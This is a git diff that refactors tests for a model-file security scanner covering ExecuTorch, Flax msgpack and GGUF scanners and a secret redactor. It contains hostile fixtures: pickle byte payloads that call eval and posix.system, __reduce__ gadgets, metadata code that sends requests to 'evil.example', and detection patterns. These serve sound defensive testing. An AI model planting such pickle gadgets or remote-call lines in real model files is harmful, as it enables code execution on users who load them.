+ _assert_absent( + redacted, "DICTSECRET1234567890", "KEYDICTSECRET1234567890", "CALLSECRET1234567890", "KEYCALLSECRET1234567890" + ) assert '"name": "api_key", "value": ' in redacted assert '"key": "client_secret", "value": ' in redacted assert 'Credential(name="api_key", value=)' in redacted @@ -2913,8 +2852,7 @@ def test_redacts_acronym_prefixed_sensitive_assignments() -> None: redacted = redact_evidence_string(text, max_chars=None) - assert "AWSACRONYMSECRET1234567890" not in redacted - assert "DBACRONYMSECRET1234567890" not in redacted + _assert_absent(redacted, "AWSACRONYMSECRET1234567890", "DBACRONYMSECRET1234567890") assert "AWSAccessKeyId = " in redacted assert "DBPassword = " in redacted assert 'DBPasswordlessMode = "enabled"' in redacted @@ -2967,13 +2905,13 @@ def test_sensitive_keyed_calls_preserve_dangerous_value_operations() -> None: redacted = redact_evidence_string(text, max_chars=None) - for secret in ( + _assert_absent( + redacted, "GETTERSECRET1234567890", "SETTERSECRET1234567890", "COMPILESECRET1234567890", "OPTIONSECRET1234567890", - ): - assert secret not in redacted + ) assert 'os.getenv("CLIENT_SECRET", eval(""))' in redacted assert 'headers.setdefault("api_key", exec(""))' in redacted assert 'Field(key="client_secret", value=compile("", "", ""))' in redacted @@ -3045,13 +2983,13 @@ def test_redacts_non_operator_sensitive_comparisons_without_losing_context() -> redacted = redact_evidence_string(text, max_chars=None) - for secret in ( + _assert_absent( + redacted, "DIGESTSECRET1234567890", "REVERSEDIGESTSECRET1234567890", "PREFIXSECRET1234567890", "MATCHSECRET1234567890", - ): - assert secret not in redacted + ) assert 'hmac.compare_digest(api_key, "")' in redacted assert 'hmac.compare_digest("", client_secret)' in redacted assert 'api_key.startswith("")' in redacted @@ -3096,7 +3034,7 @@ def test_redacts_sensitive_fstring_interpolations_without_losing_calls() -> None def test_python_annotations_and_block_headers_are_not_assignments() -> None: """Credential-shaped Python targets must not erase annotations or block bodies.""" - text = ( + _assert_evidence_unchanged( 'api_key: str\ncredentials: "CredentialStore"\n' 'def handle(api_key: str, authorization: "Header"):\n eval("1")\n' 'with open("visible") as api_key:\n exec("2")\n' @@ -3104,8 +3042,6 @@ def test_python_annotations_and_block_headers_are_not_assignments() -> None: 'for api_key in values:\n compile("3", "visible", "exec")' ) - assert redact_evidence_string(text, max_chars=None) == text - def test_redacts_generic_python_credential_keys_and_framed_variants() -> None: """Exact generic credential keys should redact without broad near-match false positives.""" @@ -3140,9 +3076,7 @@ def test_unparseable_sensitive_comparison_and_keyed_calls_fail_closed() -> None: redacted = redact_evidence_string(text, max_chars=None) - assert "FRAMEDGETSECRET1234567890" not in redacted - assert "FRAMEDSETSECRET1234567890" not in redacted - assert "FRAMEDCOMPARESECRET1234567890" not in redacted + _assert_absent(redacted, "FRAMEDGETSECRET1234567890", "FRAMEDSETSECRET1234567890", "FRAMEDCOMPARESECRET1234567890") assert 'os.getenv(key="CLIENT_SECRET", default=)' in redacted assert 'os.putenv(key="AWS_SECRET_ACCESS_KEY", value=)' in redacted assert "api_key == " in redacted @@ -3187,13 +3121,13 @@ def test_auth_and_cookie_expressions_preserve_executable_call_context() -> None: redacted = redact_evidence_string(text, max_chars=None) - for secret in ( + _assert_absent( + redacted, "AUTHCALLSECRET1234567890", "COOKIECALLSECRET1234567890", "COOKIECOMPILESECRET1234567890", "BASICAUTHSECRET1234567890", - ): - assert secret not in redacted + ) assert 'auth=eval("")' in redacted assert 'cookie=exec("")' in redacted assert 'compile("", "", "")' in redacted @@ -3264,8 +3198,7 @@ def test_unparseable_literal_credential_pairs_fail_closed() -> None: redacted = redact_evidence_string(text, max_chars=None) assert "FRAMEDPAIRSECRET1234567890" not in redacted - assert '("api_key", )' in redacted - assert '("region", "visible")' in redacted + _assert_present(redacted, '("api_key", )', '("region", "visible")') def test_redacts_sensitive_membership_comparisons() -> None: @@ -3280,9 +3213,7 @@ def test_redacts_sensitive_membership_comparisons() -> None: redacted = redact_evidence_string(text, max_chars=None) - assert "MEMBERSHIPSECRET1234567890" not in redacted - assert "NOTINSECRET1234567890" not in redacted - assert "REVERSEMEMBERSHIPSECRET1234567890" not in redacted + _assert_absent(redacted, "MEMBERSHIPSECRET1234567890", "NOTINSECRET1234567890", "REVERSEMEMBERSHIPSECRET1234567890") assert "api_key in " in redacted assert "client_secret not in " in redacted assert " in api_keys" in redacted @@ -3303,9 +3234,7 @@ def test_redacts_affixed_sensitive_targets_without_control_false_positives() -> redacted = redact_evidence_string(text, max_chars=None) - assert "PRIVATESECRET1234567890" not in redacted - assert "NUMBEREDSECRET1234567890" not in redacted - assert "PLURALSECRET1234567890" not in redacted + _assert_absent(redacted, "PRIVATESECRET1234567890", "NUMBEREDSECRET1234567890", "PLURALSECRET1234567890") assert '_api_key = ""' in redacted assert "api_key2 = " in redacted assert "api_keys = " in redacted @@ -3380,20 +3309,13 @@ def test_redacts_sensitive_identifier_subscript_targets() -> None: redacted = redact_evidence_string(text, max_chars=None) - assert "ENVSECRET1234567890" not in redacted - assert "CONFIGSECRET1234567890" not in redacted - assert "AUTHSECRET1234567890" not in redacted - assert "visible-count" in redacted - assert "visible-timeout" in redacted - assert "visible-tokenizer" in redacted - assert 'eval("1 + 1")' in redacted + _assert_absent(redacted, "ENVSECRET1234567890", "CONFIGSECRET1234567890", "AUTHSECRET1234567890") + _assert_present(redacted, "visible-count", "visible-timeout", "visible-tokenizer", 'eval("1 + 1")') def test_dynamic_sensitive_named_subscript_preserves_dangerous_context() -> None: """A dynamic index named token is not a literal credential key on arbitrary containers.""" - text = 'handlers[token] = eval("MALICIOUS_CONTEXT")' - - assert redact_evidence_string(text, max_chars=None) == text + _assert_evidence_unchanged('handlers[token] = eval("MALICIOUS_CONTEXT")') def test_redacts_exact_auth_targets_without_auth_control_false_positives() -> None: @@ -3407,9 +3329,7 @@ def test_redacts_exact_auth_targets_without_auth_control_false_positives() -> No redacted = redact_evidence_string(text, max_chars=None) - assert "AUTHSECRET1234567890" not in redacted - assert "BASICAUTHSECRET1234567890" not in redacted - assert "MAPPINGAUTHSECRET1234567890" not in redacted + _assert_absent(redacted, "AUTHSECRET1234567890", "BASICAUTHSECRET1234567890", "MAPPINGAUTHSECRET1234567890") assert "auth = " in redacted assert "basic_auth = " in redacted assert 'config["auth"] = ""' in redacted @@ -3469,11 +3389,8 @@ def test_indented_python_snippets_use_code_aware_comparison_redaction() -> None: redacted = redact_evidence_string(text, max_chars=None) - assert "COMPARESECRET1234567890" not in redacted - assert "MEMBERSHIPSECRET1234567890" not in redacted - assert "visible" in redacted - assert 'eval("1")' in redacted - assert 'exec("2")' in redacted + _assert_absent(redacted, "COMPARESECRET1234567890", "MEMBERSHIPSECRET1234567890") + _assert_present(redacted, "visible", 'eval("1")', 'exec("2")') def test_indented_embedded_name_value_dict_is_redacted() -> None: @@ -3483,8 +3400,7 @@ def test_indented_embedded_name_value_dict_is_redacted() -> None: redacted = redact_evidence_string(text, max_chars=None) assert "INDENTED_DICT_SECRET" not in redacted - assert '"value": ' in redacted - assert 'eval("1")' in redacted + _assert_present(redacted, '"value": ', 'eval("1")') def test_single_line_indented_comparison_preserves_dangerous_call_context() -> None: @@ -3499,9 +3415,7 @@ def test_single_line_indented_comparison_preserves_dangerous_call_context() -> N def test_indented_python_return_annotation_is_not_treated_as_r_assignment() -> None: """Dedented routing should preserve Python annotations named like credentials.""" - text = " def build() -> token:\n return visible" - - assert redact_evidence_string(text, max_chars=None) == text + _assert_evidence_unchanged(" def build() -> token:\n return visible") def test_redacts_triple_quoted_and_escaped_quote_secret_assignments() -> None: @@ -3510,10 +3424,8 @@ def test_redacts_triple_quoted_and_escaped_quote_secret_assignments() -> None: redacted = redact_evidence_string(text, max_chars=500) - assert "TRIPLESECRET123" not in redacted - assert "TAILSECRET456" not in redacted - assert 'TOKEN = """"""' in redacted - assert 'os.environ["AWS_SECRET_ACCESS_KEY"] = ""' in redacted + _assert_absent(redacted, "TRIPLESECRET123", "TAILSECRET456") + _assert_present(redacted, 'TOKEN = """"""', 'os.environ["AWS_SECRET_ACCESS_KEY"] = ""') def test_redacts_detail_sensitive_container_assignments() -> None: @@ -3522,9 +3434,7 @@ def test_redacts_detail_sensitive_container_assignments() -> None: redacted = redact_evidence_string(text, max_chars=None) assert "CONTAINERSECRET1234567890" not in redacted - assert "credentials = " in redacted - assert 'credentials_map = {"value": "visible"}' in redacted - assert 'eval("1")' in redacted + _assert_present(redacted, "credentials = ", 'credentials_map = {"value": "visible"}', 'eval("1")') def test_redacts_sensitive_string_annotations() -> None: @@ -3533,9 +3443,7 @@ def test_redacts_sensitive_string_annotations() -> None: redacted = redact_evidence_string(text, max_chars=None) assert "ANNOTATIONSECRET1234567890" not in redacted - assert 'api_key: ""' in redacted - assert 'api_key_count: "visible"' in redacted - assert 'eval("1")' in redacted + _assert_present(redacted, 'api_key: ""', 'api_key_count: "visible"', 'eval("1")') def test_sensitive_assignments_preserve_dangerous_rhs_calls() -> None: @@ -3555,9 +3463,7 @@ def test_redacts_simple_cookie_and_session_assignments() -> None: redacted = redact_evidence_string(text, max_chars=None) - assert "COOKIESECRET1234567890" not in redacted - assert "COOKIESSECRET1234567890" not in redacted - assert "SESSIONSECRET1234567890" not in redacted + _assert_absent(redacted, "COOKIESECRET1234567890", "COOKIESSECRET1234567890", "SESSIONSECRET1234567890") assert "cookie = " in redacted assert "cookies = " in redacted assert "session_id = " in redacted @@ -3646,3 +3552,7 @@ def test_untrusted_error_message_discards_mixed_secret_shapes() -> None: assert redacted == REDACTED_EVIDENCE_VALUE assert leaked_secret not in redacted + + +def _assert_evidence_unchanged(text: str) -> None: + assert redact_evidence_string(text, max_chars=None) == text diff --git a/tests/scanners/test_executorch_scanner.py b/tests/scanners/test_executorch_scanner.py index d2432a1b6..41579c8fc 100644 --- a/tests/scanners/test_executorch_scanner.py +++ b/tests/scanners/test_executorch_scanner.py @@ -20,6 +20,7 @@ ) from modelaudit.scanners.pytorch_binary_scanner import PyTorchBinaryScanner from modelaudit.utils.file.detection import detect_file_format +from tests.helpers.file_creators import EvalPayload _ASSETS_DIR = Path(__file__).resolve().parents[1] / "assets" @@ -55,12 +56,7 @@ def create_executorch_archive(tmp_path: Path, *, malicious: bool = False) -> Pat z.writestr("version", "1") data: dict[str, object] = {"weights": [1, 2, 3]} if malicious: - - class Evil: - def __reduce__(self): - return (eval, ("print('evil')",)) - - data["malicious"] = Evil() + data["malicious"] = EvalPayload(("print('evil')",)) z.writestr("bytecode.pkl", pickle.dumps(data)) return zip_path @@ -1622,99 +1618,47 @@ def test_executorch_scans_hidden_protocol6_pickle_member(tmp_path: Path) -> None def test_executorch_protocol6_near_match_remains_unselected(tmp_path: Path) -> None: - model_path = tmp_path / "protocol6-near-match.ptl" - with zipfile.ZipFile(model_path, "w") as zipf: - zipf.writestr("version", "1") - zipf.writestr("payload", b"\x80\x06not a pickle payload") - - result = ExecuTorchScanner().scan(str(model_path)) - - assert result.success is True - assert result.metadata["pickle_files"] == [] + _assert_executorch_pickle_near_match_unselected( + tmp_path, ("protocol6-near-match.ptl"), (b"\x80\x06not a pickle payload") + ) def test_executorch_scans_hidden_protocol1_binint2_pickle_member(tmp_path: Path) -> None: - model_path = tmp_path / "hidden-protocol1-binint2-pickle.ptl" - payload = b"M\x01\x000cbuiltins\neval\n(S\"print('evil')\"\ntR." - with zipfile.ZipFile(model_path, "w") as zipf: - zipf.writestr("version", "1") - zipf.writestr("payload", payload) - - result = ExecuTorchScanner().scan(str(model_path)) - - assert result.metadata["pickle_files"] == ["payload"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "payload" - for issue in result.issues + _assert_executorch_hidden_pickle( + tmp_path, ("hidden-protocol1-binint2-pickle.ptl"), (b"M\x01\x000cbuiltins\neval\n(S\"print('evil')\"\ntR.") ) def test_executorch_protocol1_binint2_near_match_remains_unselected(tmp_path: Path) -> None: - model_path = tmp_path / "protocol1-binint2-near-match.ptl" - with zipfile.ZipFile(model_path, "w") as zipf: - zipf.writestr("version", "1") - zipf.writestr("payload", b"M\x01\x00not a pickle payload") - - result = ExecuTorchScanner().scan(str(model_path)) - - assert result.success is True - assert result.metadata["pickle_files"] == [] + _assert_executorch_pickle_near_match_unselected( + tmp_path, ("protocol1-binint2-near-match.ptl"), (b"M\x01\x00not a pickle payload") + ) def test_executorch_scans_hidden_protocol0_pickle_with_global_comment_token(tmp_path: Path) -> None: - model_path = tmp_path / "hidden-protocol0-comment-token.ptl" - payload = b"cposix\nsystem\n#\n(S'echo pwned'\ntR." - with zipfile.ZipFile(model_path, "w") as zipf: - zipf.writestr("version", "1") - zipf.writestr("payload", payload) - - result = ExecuTorchScanner().scan(str(model_path)) - - assert result.metadata["pickle_files"] == ["payload"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "payload" - for issue in result.issues + _assert_executorch_hidden_pickle( + tmp_path, ("hidden-protocol0-comment-token.ptl"), (b"cposix\nsystem\n#\n(S'echo pwned'\ntR.") ) def test_executorch_scans_hidden_protocol0_pickle_with_repeated_global_comment_tokens(tmp_path: Path) -> None: - model_path = tmp_path / "hidden-protocol0-repeated-comment-tokens.ptl" - payload = b"cposix\nsystem\n#\n#\nN0cbuiltins\neval\n#\n(S'echo pwned'\ntR." - with zipfile.ZipFile(model_path, "w") as zipf: - zipf.writestr("version", "1") - zipf.writestr("payload", payload) - - result = ExecuTorchScanner().scan(str(model_path)) - - assert result.metadata["pickle_files"] == ["payload"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "payload" - for issue in result.issues + _assert_executorch_hidden_pickle( + tmp_path, + ("hidden-protocol0-repeated-comment-tokens.ptl"), + (b"cposix\nsystem\n#\n#\nN0cbuiltins\neval\n#\n(S'echo pwned'\ntR."), ) def test_executorch_protocol0_global_comment_near_match_remains_unselected(tmp_path: Path) -> None: - model_path = tmp_path / "protocol0-comment-near-match.ptl" - with zipfile.ZipFile(model_path, "w") as zipf: - zipf.writestr("version", "1") - zipf.writestr("payload", b"cmetadata\nlabel\n#\nplain text") - - result = ExecuTorchScanner().scan(str(model_path)) - - assert result.success is True - assert result.metadata["pickle_files"] == [] + _assert_executorch_pickle_near_match_unselected( + tmp_path, ("protocol0-comment-near-match.ptl"), (b"cmetadata\nlabel\n#\nplain text") + ) def test_executorch_protocol0_repeated_global_comment_near_match_remains_unselected(tmp_path: Path) -> None: - model_path = tmp_path / "protocol0-repeated-comment-near-match.ptl" - with zipfile.ZipFile(model_path, "w") as zipf: - zipf.writestr("version", "1") - zipf.writestr("payload", b"cmetadata\nlabel\n#\n#\nplain text") - - result = ExecuTorchScanner().scan(str(model_path)) - - assert result.success is True - assert result.metadata["pickle_files"] == [] + _assert_executorch_pickle_near_match_unselected( + tmp_path, ("protocol0-repeated-comment-near-match.ptl"), (b"cmetadata\nlabel\n#\n#\nplain text") + ) def test_executorch_protocol0_global_comment_token_limit_fails_closed(tmp_path: Path) -> None: @@ -1781,18 +1725,10 @@ def test_executorch_scans_hidden_protocolless_binary_pickle(tmp_path: Path) -> N def test_executorch_scans_hidden_protocolless_binary_pickle_without_frame(tmp_path: Path) -> None: - model_path = tmp_path / "hidden-protocolless-binary-without-frame.ptl" - payload = b"\x8c\x08builtins\x94\x8c\x04eval\x94\x93\x94\x8c\rprint('evil')\x94\x85R." - with zipfile.ZipFile(model_path, "w") as zipf: - zipf.writestr("version", "1") - zipf.writestr("payload", payload) - - result = ExecuTorchScanner().scan(str(model_path)) - - assert result.metadata["pickle_files"] == ["payload"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "payload" - for issue in result.issues + _assert_executorch_hidden_pickle( + tmp_path, + ("hidden-protocolless-binary-without-frame.ptl"), + (b"\x8c\x08builtins\x94\x8c\x04eval\x94\x93\x94\x8c\rprint('evil')\x94\x85R."), ) @@ -1821,15 +1757,9 @@ def test_executorch_binary_pickle_near_match_remains_unselected(tmp_path: Path) def test_executorch_complete_binary_opcode_near_match_remains_unselected(tmp_path: Path) -> None: - model_path = tmp_path / "complete-binary-opcode-near-match.ptl" - with zipfile.ZipFile(model_path, "w") as zipf: - zipf.writestr("version", "1") - zipf.writestr("payload", b"\x80\x04NNNnot-a-pickle") - - result = ExecuTorchScanner().scan(str(model_path)) - - assert result.success is True - assert result.metadata["pickle_files"] == [] + _assert_executorch_pickle_near_match_unselected( + tmp_path, ("complete-binary-opcode-near-match.ptl"), (b"\x80\x04NNNnot-a-pickle") + ) def test_executorch_hidden_pickle_discovery_does_not_short_circuit_on_data_pkl(tmp_path: Path) -> None: @@ -2174,3 +2104,31 @@ def test_executorch_case_insensitive_python_suffix_is_flagged(tmp_path: Path) -> result = ExecuTorchScanner().scan(str(model_path)) assert any(issue.rule_code == "S104" and issue.details.get("file") == "hooks.PY" for issue in result.issues) + + +def _assert_executorch_hidden_pickle(tmp_path: Path, filename: str, pickle_payload: bytes) -> None: + model_path = tmp_path / filename + payload = pickle_payload + with zipfile.ZipFile(model_path, "w") as zipf: + zipf.writestr("version", "1") + zipf.writestr("payload", payload) + + result = ExecuTorchScanner().scan(str(model_path)) + + assert result.metadata["pickle_files"] == ["payload"] + assert any( + issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "payload" + for issue in result.issues + ) + + +def _assert_executorch_pickle_near_match_unselected(tmp_path: Path, filename: str, pickle_payload: bytes) -> None: + model_path = tmp_path / filename + with zipfile.ZipFile(model_path, "w") as zipf: + zipf.writestr("version", "1") + zipf.writestr("payload", pickle_payload) + + result = ExecuTorchScanner().scan(str(model_path)) + + assert result.success is True + assert result.metadata["pickle_files"] == [] diff --git a/tests/scanners/test_flax_msgpack_scanner.py b/tests/scanners/test_flax_msgpack_scanner.py index 81f36ede6..7a47087b6 100644 --- a/tests/scanners/test_flax_msgpack_scanner.py +++ b/tests/scanners/test_flax_msgpack_scanner.py @@ -11,6 +11,8 @@ import pytest +from tests.helpers.cache import assert_inconclusive_not_cached as _assert_inconclusive_aggregate_not_cached + # Skip if msgpack is not available before importing it pytest.importorskip("msgpack") @@ -31,6 +33,7 @@ _pattern_has_stream_unsafe_repeat, ) from modelaudit.utils.file.detection import FLAX_MSGPACK_STRUCTURE_READ_BYTES +from tests.helpers.text import LowerCountingText as _LowerCountingText def create_msgpack_file(path: Path, data: Any) -> None: @@ -161,42 +164,6 @@ def _write_sparse_large_flax_ndarray_ext( output.write(trailing_body) -def _assert_inconclusive_aggregate_not_cached( - path: Path, - expected_reason: str, - cache_dir: Path, - **scan_kwargs: Any, -) -> None: - reset_cache_manager() - try: - first = scan_model_directory_or_file( - str(path), - cache_enabled=True, - cache_dir=str(cache_dir), - min_cache_file_size=0, - **scan_kwargs, - ) - second = scan_model_directory_or_file( - str(path), - cache_enabled=True, - cache_dir=str(cache_dir), - min_cache_file_size=0, - **scan_kwargs, - ) - - for aggregate in (first, second): - metadata = aggregate.file_metadata[str(path)] - assert metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert expected_reason in metadata["scan_outcome_reasons"] - assert not [ - issue for issue in aggregate.issues if issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - ] - assert determine_exit_code(aggregate) == 2 - assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] == 0 - finally: - reset_cache_manager() - - def create_malicious_msgpack_file(path): """Create a msgpack file with suspicious content.""" malicious_data = { @@ -208,19 +175,6 @@ def create_malicious_msgpack_file(path): create_msgpack_file(path, malicious_data) -class _LowerCountingText(str): - lower_calls: int - - def __new__(cls, value: str) -> "_LowerCountingText": - instance = super().__new__(cls, value) - instance.lower_calls = 0 - return instance - - def lower(self) -> str: - self.lower_calls += 1 - return super().lower() - - def test_matching_jax_transforms_reuses_lowered_value_text() -> None: value = _LowerCountingText("dynamic_eval payload") @@ -325,31 +279,14 @@ def test_flax_msgpack_suspicious_content(tmp_path): def test_flax_msgpack_malicious_content_marks_scan_unsuccessful(tmp_path: Path) -> None: """CRITICAL msgpack findings should make the scan unsuccessful.""" path = tmp_path / "malicious.msgpack" - create_msgpack_file(path, {"params": {"w": [1, 2, 3]}, "__reduce__": "os.system"}) - - result = FlaxMsgpackScanner().scan(str(path)) - - assert result.success is False - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.message == "Suspicious object attribute detected: __reduce__" - for issue in result.issues - ) + _assert_flax_malicious_content(path, "__reduce__", "os.system", "Suspicious object attribute detected: __reduce__") def test_flax_msgpack_byte_encoded_dangerous_key_is_critical(tmp_path: Path) -> None: path = tmp_path / "byte_reduce_key.msgpack" create_msgpack_file(path, {"params": {"w": [1, 2, 3]}, b"__reduce__": "os.system"}) - result = FlaxMsgpackScanner().scan(str(path)) - - assert result.success is False - assert any( - issue.severity == IssueSeverity.CRITICAL - and issue.message == "Suspicious object attribute detected: __reduce__" - and issue.location == "root/__reduce__" - and issue.details["suspicious_key"] == "__reduce__" - for issue in result.issues - ) + _assert_flax_key(path, "Suspicious object attribute detected: __reduce__", "root/__reduce__", "__reduce__") def test_flax_msgpack_byte_encoded_dangerous_top_level_key_is_critical(tmp_path: Path) -> None: @@ -399,16 +336,7 @@ def test_flax_msgpack_byte_encoded_function_metadata_key_is_value_aware(tmp_path path = tmp_path / "byte_restore_fn_key.msgpack" create_msgpack_file(path, {"params": {"w": [1, 2, 3]}, b"restore_fn": "eval"}) - result = FlaxMsgpackScanner().scan(str(path)) - - assert result.success is False - assert any( - issue.severity == IssueSeverity.CRITICAL - and issue.message == "Suspicious object attribute value detected: restore_fn" - and issue.location == "root/restore_fn" - and issue.details["suspicious_key"] == "restore_fn" - for issue in result.issues - ) + _assert_flax_key(path, "Suspicious object attribute value detected: restore_fn", "root/restore_fn", "restore_fn") def test_flax_msgpack_byte_encoded_function_metadata_value_is_checked(tmp_path: Path) -> None: @@ -468,16 +396,7 @@ def test_flax_msgpack_restore_fn_custom_value_no_critical(tmp_path: Path) -> Non def test_flax_msgpack_restore_fn_dangerous_value_still_critical(tmp_path: Path) -> None: """Function metadata that directly names dangerous callables should stay critical.""" path = tmp_path / "dangerous_restore_fn.msgpack" - create_msgpack_file(path, {"params": {"w": [1, 2, 3]}, "restore_fn": "eval"}) - - result = FlaxMsgpackScanner().scan(str(path)) - - assert result.success is False - assert any( - issue.severity == IssueSeverity.CRITICAL - and issue.message == "Suspicious object attribute value detected: restore_fn" - for issue in result.issues - ) + _assert_flax_malicious_content(path, "restore_fn", "eval", "Suspicious object attribute value detected: restore_fn") def test_flax_msgpack_over_budget_padded_restore_fn_dangerous_value_is_critical(tmp_path: Path) -> None: @@ -2579,36 +2498,15 @@ def test_flax_msgpack_redacts_url_path_capability_token_sample(tmp_path: Path) - def test_flax_msgpack_redacts_standalone_secret_shaped_metadata_key(tmp_path: Path) -> None: - path = tmp_path / "standalone_secret_key.msgpack" - token = "ghp_" + "a" * 36 - create_msgpack_file(path, {token: b"0" * 4096}) - - result = FlaxMsgpackScanner().scan(str(path)) - - assert result.metadata["top_level_keys"] == [""] - assert token not in result.to_json() + _assert_flax_secret_metadata_key(tmp_path, ("standalone_secret_key.msgpack"), ("ghp_"), ("a"), (36)) def test_flax_msgpack_redacts_huggingface_token_metadata_key(tmp_path: Path) -> None: - path = tmp_path / "huggingface_token_key.msgpack" - token = "hf_" + "a" * 34 - create_msgpack_file(path, {token: b"0" * 4096}) - - result = FlaxMsgpackScanner().scan(str(path)) - - assert result.metadata["top_level_keys"] == [""] - assert token not in result.to_json() + _assert_flax_secret_metadata_key(tmp_path, ("huggingface_token_key.msgpack"), ("hf_"), ("a"), (34)) def test_flax_msgpack_redacts_url_safe_openai_project_key(tmp_path: Path) -> None: - path = tmp_path / "openai_project_key.msgpack" - token = "sk-proj-" + "abc_def-" * 4 - create_msgpack_file(path, {token: b"0" * 4096}) - - result = FlaxMsgpackScanner().scan(str(path)) - - assert result.metadata["top_level_keys"] == [""] - assert token not in result.to_json() + _assert_flax_secret_metadata_key(tmp_path, ("openai_project_key.msgpack"), ("sk-proj-"), ("abc_def-"), (4)) def test_flax_msgpack_redacts_percent_encoded_secret_metadata_key(tmp_path: Path) -> None: @@ -3284,3 +3182,38 @@ def test_flax_msgpack_deduplicates_configured_suspicious_patterns(tmp_path: Path if check.name == "Code Pattern Security Check" and check.details["pattern"] == r"import\s+subprocess" ] assert len(findings) == 1 + + +def _assert_flax_secret_metadata_key( + tmp_path: Path, filename: str, token_prefix: str, token_char: str, token_length: int +) -> None: + path = tmp_path / filename + token = token_prefix + token_char * token_length + create_msgpack_file(path, {token: b"0" * 4096}) + + result = FlaxMsgpackScanner().scan(str(path)) + + assert result.metadata["top_level_keys"] == [""] + assert token not in result.to_json() + + +def _assert_flax_key(path: Path, message: str, location: str, key: str) -> None: + result = FlaxMsgpackScanner().scan(str(path)) + + assert result.success is False + assert any( + issue.severity == IssueSeverity.CRITICAL + and issue.message == message + and issue.location == location + and issue.details["suspicious_key"] == key + for issue in result.issues + ) + + +def _assert_flax_malicious_content(path: Path, key: str, value: str, message: str) -> None: + create_msgpack_file(path, {"params": {"w": [1, 2, 3]}, key: value}) + + result = FlaxMsgpackScanner().scan(str(path)) + + assert result.success is False + assert any(issue.severity == IssueSeverity.CRITICAL and issue.message == message for issue in result.issues) diff --git a/tests/scanners/test_gguf_scanner.py b/tests/scanners/test_gguf_scanner.py index 830c769eb..83db80740 100644 --- a/tests/scanners/test_gguf_scanner.py +++ b/tests/scanners/test_gguf_scanner.py @@ -33,6 +33,7 @@ ) from tests.cli_output import parse_click_json_output from tests.helpers import create_malicious_pickle, create_mock_gguf +from tests.helpers.cache import single_file_metadata as _single_file_metadata _RANK_262_TOKENIZER_ITEM_COUNT = 262_144 @@ -345,10 +346,6 @@ def _write_rank_262_shaped_tokenizer_gguf(path: Path) -> None: ) -def _single_file_metadata(aggregate: Any) -> Any: - return next(iter(aggregate.file_metadata.values())) - - def _assert_inconclusive_exit2(aggregate: Any, reason: str) -> None: metadata = _single_file_metadata(aggregate) assert aggregate.success is False @@ -827,36 +824,14 @@ def test_gguf_scanner_delegates_named_chat_templates_to_jinja_analysis(tmp_path: def test_gguf_scanner_keeps_benign_chat_templates_clean(tmp_path: Path) -> None: - path = create_mock_gguf( - tmp_path / "benign.gguf", - metadata={ - "tokenizer.chat_template": "{% for message in messages %}{{ message['content'] }}{% endfor %}", - }, - ) - - result = GgufScanner().scan(str(path)) - - assert any(check.name == "Jinja2 SSTI Analysis" and check.status == CheckStatus.PASSED for check in result.checks) - assert not any( - check.name == "Jinja2 Template Injection Detection" and check.status == CheckStatus.FAILED - for check in result.checks + _assert_gguf_benign_template( + tmp_path, ("benign.gguf"), ("{% for message in messages %}{{ message['content'] }}{% endfor %}") ) def test_gguf_scanner_keeps_benign_macro_chat_templates_clean(tmp_path: Path) -> None: - path = create_mock_gguf( - tmp_path / "benign-macro.gguf", - metadata={ - "tokenizer.chat_template": "{% macro render(message) %}{{ message['content'] }}{% endmacro %}", - }, - ) - - result = GgufScanner().scan(str(path)) - - assert any(check.name == "Jinja2 SSTI Analysis" and check.status == CheckStatus.PASSED for check in result.checks) - assert not any( - check.name == "Jinja2 Template Injection Detection" and check.status == CheckStatus.FAILED - for check in result.checks + _assert_gguf_benign_template( + tmp_path, ("benign-macro.gguf"), ("{% macro render(message) %}{{ message['content'] }}{% endmacro %}") ) @@ -1976,27 +1951,13 @@ def test_gguf_metadata_remote_fetch_detects_url_assignment_after_many_benign_url def test_gguf_metadata_remote_fetch_detects_alias_after_many_benign_aliases(tmp_path: Path) -> None: benign_aliases = "\n".join(f"import requests as r{index}" for index in range(8)) value = f"{benign_aliases}\nimport requests as target_client\ntarget_client.delete('https://evil.example/payload')" - path = create_mock_gguf(tmp_path / "capped-client-aliases.gguf", metadata={"callback": value}) - - result = GgufScanner().scan(str(path)) - - checks = _failed_metadata_value_checks(result) - assert checks - assert any(check.details["evidence_type"] == "remote_fetch" for check in checks) - assert all(check.rule_code == "S902" for check in checks) + _assert_remote_fetch_alias(tmp_path, value, "capped-client-aliases.gguf") def test_gguf_metadata_remote_fetch_detects_alias_after_truncated_alias_window(tmp_path: Path) -> None: benign_aliases = "\n".join(f"import requests as r{index}" for index in range(20)) value = f"{benign_aliases}\nimport requests as target_client\ntarget_client.delete('https://evil.example/payload')" - path = create_mock_gguf(tmp_path / "truncated-client-aliases.gguf", metadata={"callback": value}) - - result = GgufScanner().scan(str(path)) - - checks = _failed_metadata_value_checks(result) - assert checks - assert any(check.details["evidence_type"] == "remote_fetch" for check in checks) - assert all(check.rule_code == "S902" for check in checks) + _assert_remote_fetch_alias(tmp_path, value, "truncated-client-aliases.gguf") def test_gguf_metadata_remote_fetch_detects_later_alias_after_benign_omitted_alias(tmp_path: Path) -> None: @@ -2007,14 +1968,7 @@ def test_gguf_metadata_remote_fetch_detects_later_alias_after_benign_omitted_ali "import requests as target_client\n" "target_client.delete('https://evil.example/payload')" ) - path = create_mock_gguf(tmp_path / "capped-later-client-alias.gguf", metadata={"callback": value}) - - result = GgufScanner().scan(str(path)) - - checks = _failed_metadata_value_checks(result) - assert checks - assert any(check.details["evidence_type"] == "remote_fetch" for check in checks) - assert all(check.rule_code == "S902" for check in checks) + _assert_remote_fetch_alias(tmp_path, value, "capped-later-client-alias.gguf") def test_gguf_metadata_remote_fetch_detects_function_alias_after_many_benign_aliases(tmp_path: Path) -> None: @@ -2022,14 +1976,7 @@ def test_gguf_metadata_remote_fetch_detects_function_alias_after_many_benign_ali value = ( f"{benign_aliases}\nfrom requests import delete as target_delete\ntarget_delete('https://evil.example/payload')" ) - path = create_mock_gguf(tmp_path / "capped-function-aliases.gguf", metadata={"callback": value}) - - result = GgufScanner().scan(str(path)) - - checks = 